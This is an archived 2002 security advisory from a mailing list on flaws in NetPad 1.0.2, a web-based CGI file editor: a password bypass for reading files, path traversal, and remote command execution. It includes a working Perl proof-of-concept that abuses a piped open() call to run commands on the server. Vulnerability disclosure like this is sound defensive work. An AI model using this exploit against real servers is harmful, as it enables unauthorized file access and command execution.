[UNIX] Levcgi.com's NetPad Multiple Vulnerabilities
From: support@securiteam.comDate: 05/14/02
- Previous message: support@securiteam.com: "[NT] Word Mail Merge Variant Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Tue, 14 May 2002 23:09:11 +0200 (CEST)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Levcgi.com's NetPad Multiple Vulnerabilities
------------------------------------------------------------------------
SUMMARY
<http://www.levcgi.com/programs.cgi?program=netpad> NetPad is a Notepad
like program that allows you to open your files and pages online in your
browser and edit their contents through the browser without forcing you to
re-upload your changes. Multiple vulnerabilities have been found in the
product the vulnerabilities allow a remote user to view the content
otherwise inaccessible files and execute arbitrary commands.
DETAILS
Vulnerable systems:
* NetPad version 1.0.2
Password Bypass
The website claims "password security feature to prevent unauthorized
access!", however this is not true.
A password is not required to read files. It is only required to write to
files.
Path Traversal
Improper filtering of input allows one to enter the traditional
"../../../" into the input field to crawl back through directories of the
server hosting netpad.cgi, allowing one to view any file readable by the
webserver.
Command Execution
Due to improper usage of the open() function and input filtering, it is
possible for a malicious visitor to remotely execute commands on the
server hosting netpad.cgi
Remote Command Execution Exploit (POC):
#!/usr/bin/perl
# exploit for levcgi's NetPad 1.0.2
#
# This could easily be done with any browser and a little effort.
#
# requires LWP avaliable at
# http://www.linpro.no/lwp/libwww-perl-5.64.tar.gz
# also, the number of ../'s differs. It depends on what $basedir
# is set to in the netpad.cgi script
#
# usage: perl script.pl
http://site.tld/cgi-bin/netpad.cgi../../../../bin/command
use LWP::UserAgent;
$ua = new LWP::UserAgent;
$ua->agent("your open call can be exploited" . $ua->agent);
my $req = new HTTP::Request POST => $ARGV[0];
$req->content_type('application/x-www-form-urlencoded');
foreach(@ARGV){ $of .= "$_ " unless($_ eq $ARGV[0]); }
$req->content("proc=open&of=${of}|");
my $res = $ua->request($req);
if ($res->is_success) { print $res->content . "\n\nit should have
worked.\n"; }
else { print "request failed.\n"; }
ADDITIONAL INFORMATION
The information has been provided by <mailto:b0iler@hotmail.com> b0iler
and <mailto:brainrawt@hotmail.com> BrainRawt ..
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NT] Word Mail Merge Variant Vulnerability"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
